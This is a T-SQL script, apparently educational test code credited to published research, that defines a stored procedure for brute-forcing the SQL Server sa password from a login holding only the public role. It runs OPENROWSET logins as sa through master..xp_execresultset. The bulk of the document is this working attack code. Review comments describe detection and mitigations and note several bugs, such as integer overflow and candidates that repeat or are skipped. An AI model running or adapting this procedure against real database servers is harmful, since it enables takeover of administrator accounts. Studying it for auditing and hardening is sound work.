Find SA password with public role-perm test DBA
Find SA Password (Brute Force) with Public Role
FindSApublic is a brute-force password cracker that requires only membership in the public role: it relies on master..xp_execresultset and ad hoc OPENROWSET connections being usable by public to test each candidate sa password as a login attempt.
Possibilities returns how many different passwords are possible with 1 up to c characters from a universe of n different characters.
Usage:
FindSApublic n
n is an integer giving the maximum password length to attempt; candidates of length 1 up to n are tried, drawn from A-Z, 0-9, '!' and '_'. Note that the procedure keeps its round counter in an int, so with this 38-character set a value of 6 or more overflows (38 + 38^2 + ... + 38^6 exceeds the int range); candidates are also stored in a varchar(10), so n above 10 is not meaningful.
Acknowledgments
original idea:
David Litchfield
david@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you David, for sharing your report and allowing me to use it for my educational test code.
Highly recommended reading:
http://www.nextgenss.com/papers/cracking-sql-passwords.pdf
original idea and code:
Chris Anley
chris@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you Chris, for sharing your report and allowing me to use it for my educational test code.
Highly recommended reading:
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
This code is provided as is and for educational purposes only.
Developed, adapted or translated to TSQL by Joseph Gama.
-- Session options in effect for the CREATE FUNCTION in the next batch.
-- NOTE(review): SQL Server records QUOTED_IDENTIFIER and ANSI_NULLS with a
-- module when it is created, so these OFF values travel with Possibilities --
-- confirm that is intended rather than scripting-tool residue.
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS OFF
GO
CREATE function Possibilities (@c bigint, @n bigint)
-- Number of distinct strings of length 1 up to @c over an alphabet of @n
-- symbols, i.e. @n^1 + @n^2 + ... + @n^@c. Returns 0 when @c < 1 and NULL
-- when @n is NULL. Used by FindSApublic to size its brute-force loop.
-- The terms are computed with power() and summed in bigint; once a term or
-- the running total no longer fits, SQL Server raises an arithmetic overflow,
-- so callers must keep @c small for any realistic alphabet.
returns bigint
as
BEGIN
declare @total bigint, @len bigint
set @total=0
set @len=1
-- each length from 1 to @c contributes @n^len strings
while @len<=@c
BEGIN
set @total=@total+power(@n,@len)
set @len=@len+1
END
RETURN @total
END
GO
-- First pair: session options restored after the function batch.
-- Second pair: options in effect for the CREATE PROCEDURE that follows
-- (QUOTED_IDENTIFIER OFF is set twice; only the ANSI_NULLS value changes).
-- NOTE(review): as with the function, these settings are stored with the
-- procedure at creation time -- confirm OFF/OFF is intended.
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS OFF
GO
-- Brute-force the sa password from a login that holds only the public role.
-- @size: maximum candidate length; candidates are generated from a counter
--        @i in [0, @max) over the 38-character set in @keys.
-- Output: one result row, either 'Found: <pwd> in N minutes' or
--         'Not found after <rounds> rounds, up to <last candidate> in N minutes'.
-- How it escalates: for each candidate, master..xp_execresultset is asked to
-- run a generated statement that opens an OPENROWSET(MSDASQL ...) connection
-- to the local server as uid=sa;pwd=<candidate>; if that login succeeds the
-- candidate is inserted into ##temppwd, which the loop then checks. The
-- technique therefore depends on public being able to EXECUTE
-- master..xp_execresultset (an undocumented SQL Server 2000 extended
-- procedure; NOTE(review): later versions removed it -- confirm on the target)
-- and on ad hoc OPENROWSET connections being allowed.
-- NOTE(review): every wrong candidate is a failed sa login, so with login
-- auditing on this appears as a burst of failed sa logins from one host --
-- that is the detection for it. The controls that stop it are denying public
-- EXECUTE on xp_execresultset (or removing it), disabling ad hoc distributed
-- queries, and not leaving sa with a short password from this character set.
CREATE PROCEDURE FindSApublic (@size int)
AS
SET NOCOUNT ON
-- @s: candidate being built (varchar(10): longer candidates are silently
--     truncated on assignment, so @size > 10 is not meaningful).
-- @t: last candidate produced by the inner loop, reported on the
--     not-found path (NULL if no candidate was ever built).
-- @max is an int while Possibilities returns bigint; with 38 symbols,
-- 38 + 38^2 + ... + 38^6 exceeds the int range, so @size >= 6 raises an
-- arithmetic overflow on the assignment below.
DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50), @dtime datetime, @s VARCHAR(10), @t VARCHAR(10)
SET @dtime=getdate()
-- Character universe: A-Z, 0-9, '!' and '_' (38 symbols). It contains no
-- quote characters, which is why splicing the candidate into the OPENROWSET
-- string below cannot break out of the connection-string literal.
SET @keys='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_'
-- Hard-coded three-part name: the helper function must live in a database
-- named test, regardless of where this procedure itself was created.
SET @max=test.dbo.Possibilities( @size, LEN(@keys))
SET @n=len(@keys)
-- 'A' is the candidate for @i=0 (the inner loop does not run when @j=0);
-- @s is reset to '' at the end of every later round.
SET @s='A'
SET @i=0
-- Global temp table shared with the statement run through xp_execresultset.
-- It is dropped only on the two normal exit paths; if the loop aborts (the
-- overflow above, an xp_execresultset failure, or the client cancelling) it
-- stays behind and the next call fails on this CREATE TABLE.
create table ##temppwd (pwd NVARCHAR(10))
WHILE @i<@max
BEGIN
-- Decode counter @i into a candidate string. The first (rightmost) symbol is
-- @j % @n, but every later symbol uses @j % @n - 1 and divides by @n+1 (the
-- sign(len(@s)) terms switch on once @s is non-empty). Lengths 1 and 2 are
-- enumerated completely (@i = 0..37 and 38..1481), but the mapping is not
-- one-to-one beyond that -- e.g. both @i=1482 and @i=2926 decode to 'AAA' --
-- so within @max rounds some candidates of length >= 3 are tried twice and
-- others never.
SET @j=@i
WHILE (@j>0)
BEGIN
SET @temp=@j % (@n)-sign(len(@s))
if @temp<0 set @temp=@n-1
SET @j=@j /(@n+sign(len(@s)))
SET @s=substring(@keys,@temp+1,1)+@s
SET @t=@s
END
-- every candidate is echoed to the client's messages stream
print @s
declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s)
-- OPENDATASOURCE variant of the probe, kept for reference; not executed.
--set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' FROM OPENDATASOURCE(''''SQLOLEDB'''',''''Data Source='+@@SERVERNAME+N';User ID=sa;Password='+@s1+N''''').master.dbo.sysobjects '''
-- The probe. @query is a SELECT that yields the text of an INSERT; after
-- unquoting it reads:
--   insert ##temppwd select top 1 '<pwd>' from OPENROWSET('MSDASQL',
--     'DRIVER={SQL Server};SERVER=;uid=sa;pwd=<pwd>','select 1 ')
-- (empty SERVER= means the local default instance). If the sa login fails
-- the INSERT errors and nothing is written; if it succeeds one row lands
-- in ##temppwd.
set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid=sa;pwd='+@s1+N''''',''''select 1 '''')'''
-- xp_execresultset runs @query in master and then executes the statement
-- text that @query returns.
exec master..xp_execresultset @query,N'master'
if EXISTS(select * from ##temppwd)
GOTO lblFound
SET @s=''
SET @i=@i+1
END
drop table ##temppwd
-- When @size <= 0 no round runs and @t is NULL, so under the default
-- CONCAT_NULL_YIELDS_NULL setting this message comes back as NULL.
select 'Not found after '+str(@max)+' rounds, up to '+@t+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
lblFound:
drop table ##temppwd
select 'Found: '+@s+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
GO
-- Session options restored after the procedure batch (scripting-tool
-- trailer; no effect on the objects already created above).
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS ON
GO